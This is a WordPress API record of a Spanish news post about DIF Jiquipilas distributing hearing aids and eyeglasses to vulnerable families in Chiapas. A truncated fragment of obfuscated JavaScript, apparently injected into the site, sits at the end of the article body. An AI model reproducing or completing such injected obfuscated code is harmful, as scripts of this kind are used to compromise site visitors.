{"id":1703,"date":"2022-04-28T03:03:17","date_gmt":"2022-04-28T03:03:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1703"},"modified":"2022-04-28T03:09:13","modified_gmt":"2022-04-28T03:09:13","slug":"dif-jiquipilas-entrega-aparatos-funcionales-auditivos-y-visuales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1703","title":{"rendered":"DIF Jiquipilas entrega aparatos funcionales auditivos y visuales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"592\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0016-1024x592.jpg\" alt=\"\" class=\"wp-image-1708\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0016-1024x592.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0016-300x173.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0016-768x444.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0016.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Madely Montejo agradeci\u00f3 el apoyo y respaldo del Gobernador, Rutilio Escand\u00f3n Cadenas, del DIF Chiapas y del Instituto de Protecci\u00f3n Ciudadana y Beneficencia p\u00fablica\u2022 Gestionar programas sociales que garanticen mejor calidad de vida para las y los Jiquipiltecos.<\/p>\n\n\n\n<p>27 de Abril del.2022. Jiquipilas, Chiapas.- El DIF Jiquipilas que preside Madely Montejo Maza, en coordinaci\u00f3n con la Delegaci\u00f3n II Valle Zoque, han mantenido alianzas para redoblar esfuerzos y lograr gestiones importantes que garanticen mejor calidad de vida a las familias vulnerables. Por ello, realizaron la entrega de aparatos auditivos y lentes de armaz\u00f3n.Madely Montejo dijo que gracias a las pol\u00edticas p\u00fablicas del Gobernador Rutilio Escand\u00f3n Cadenas, las instituciones contin\u00faan en coordinaci\u00f3n con los ayuntamientos para que en conjunto,  demuestren bajo esquemas las necesidades prioritarias y busquen la soluci\u00f3n; dando seguimiento y atenci\u00f3n para aterrizar programas sociales de alto impacto.Las y los beneficiarios corresponden a los municipios de Jiquipilas y Ocozocoautla, qui\u00e9nes lograron est\u00e1 noble labor.Montejo Maza agradeci\u00f3 a Ana Jos\u00e9 Camacho Hortal, directora del Instituto de Protecci\u00f3n Social y Beneficencia P\u00fablica del Estado de Chiapas, por guiar una transformaci\u00f3n de resultados y lograr las gestiones a municipios con gran n\u00fameros de pacientes.Esta es una muestra del firme compromiso de una administraci\u00f3n enfocada en prioridades y de lograr cambios positivos que ayuden a Jiquipilas a caminar al desarrollo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Madely Montejo agradeci\u00f3 el apoyo y respaldo del Gobernador, Rutilio Escand\u00f3n Cadenas, del DIF Chiapas y del Instituto de Protecci\u00f3n Ciudadana y Beneficencia p\u00fablica\u2022 Gestionar programas sociales que garanticen mejor calidad de vida para las y los Jiquipiltecos. 27 de Abril del.2022. Jiquipilas, Chiapas.- El DIF Jiquipilas que preside Madely Montejo Maza, en coordinaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1708,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1703","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1703"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1703\/revisions"}],"predecessor-version":[{"id":1709,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1703\/revisions\/1709"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1708"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}